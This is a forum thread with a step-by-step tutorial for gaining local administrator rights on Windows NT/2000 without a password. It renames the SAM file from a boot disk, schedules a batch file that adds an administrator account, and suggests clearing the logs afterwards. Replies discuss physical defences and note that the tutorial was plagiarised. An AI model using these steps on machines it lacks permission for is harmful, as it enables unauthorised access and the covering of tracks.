How to create an Administrative Account without being an Administrator

[alakhiyar]

This is my first howto/tutorial, so if there are any suggestions of any kind or questions, please let me know.


How to create an Administrative Account without being an Administrator
Next time you're faced with an NT or 2k system that you need to logon to
with an administrative account and nobody knows the passwords, do the
following 12 steps to create a new account while preserving the existing
account profiles.

1) boot to a windows boot disk

2) if the C drive is NTFS use ntfsdos to mount it

3) maneuver to c:\winnt\system32\config

4) rename the SAM. file to anything you want

5) reboot and login as 'administrator' and a blank password

At this point you have administrative access, but any changes you make to
the profiles will not be saved to the proper SAM file and will be lost.
All other changes (configurations, installations, etc) made at this point
will be saved.


6) open notepad

7) type '@echo off
net user newuser mypass /ADD
net localgroup /ADD administrators newuser'

save as c:\useradd.bat

9) open a command prompt and type
at <enter a time 10 minutes or so into the future> "c:\useradd.bat"

10) reboot to your floppy

11) delete the c:\winnt\system32\config\SAM. file and rename the old one
back to SAM.

12) reboot and wait 10-15 minutes for the batch file to execute. The batch file will execute with system privledges and create the 'newuser' account and add it to the administrators group.

You can then logon with your newuser account with local administrative rights and can reset the original administrator account, clear the logs or do whatever it is you need to.

Unfortunately, the only way to defend against something like this in the wild is to ensure you have proper auditing and hope whomever it is doesn't run through your security log and edit out the appropriate entries.


There are now several new tools out there to assist you in recovering/changing passwords:

http://www.loginrecovery.com/

Login Recovery is a service to reveal user names and recover passwords for Windows NT, 2000, XP, 2003 and Vista. As long as you have physical access to the computer, your passwords can be recovered

http://ebcd.pcministry.com/

change password of any user, including administator of Windows NT/2000/XP OS. You do not need to know the old password.

http://trinityhome.org/Home/index.ph...=1&front_id=12

Here 's a sumup of some of the most important features, new and old:
-easily reset windows passwords
-4 different virusscan products integrated in a single uniform commandline with online update capability
-full ntfs write support thanks to ntfs-3g (all other drivers included as well)
-clone NTFS filesystems over the network
-wide range of hardware support (kernel 2.6.19.1 and recent kudzu hwdata)
-easy script to find all local filesystems

http://www.ubcd4win.com/contents.htm

(re)set the passwords of any user that has a valid local account, create a new local user with administrator rights, and set administrator rights to existing user on your NT system

[Aardpsymon]

or padlock the PC, password the bios and disable booting from floppies. Thats as good a defence as you can mount against this. If it wouldn't leave such a great hole in the case we would remove the floppies round here.

[Slot]

or padlock the PC, password the bios and disable booting from floppies. Thats as good a defence as you can mount against this. If it wouldn't leave such a great hole in the case we would remove the floppies round here.

Better take out USB, CD, and network bootability too

[Info Tech Geek]

or just download the NT Password & Registry Editor Bootdisk and change the password for the admin or any other account.

[MrLinus]

Tutorial was written by someone from http://www.security-forums.com/viewtopic.php?t=16252

If you write a tutorial please make it your own work rather than cut and paste.

[Slot]

Tutorial was written by someone from http://www.security-forums.com/viewtopic.php?t=16252

If you write a tutorial please make it your own work rather than cut and paste.

hm... thats no bueno.

[Negative]

Tutorial was written by someone from http://www.security-forums.com/viewtopic.php?t=16252

He's also a (previous, because banned) Antionline member ...

[acidtone]

lol

i've been waiting for the oppurtune moment to be able to use this smiley. and looks like i now got my chance.

looks like the OP has been caught out not once, but twice.

[Info Tech Geek]

lol

i've been waiting for the oppurtune moment to be able to use this smiley. and looks like i now got my chance.

looks like the OP has been caught out not once, but twice.

UM? The OP wasn't previously banned, the original author of the OPs stolen material was a banned member.

[Negative]

Acid didn't say anything about the OP being banned...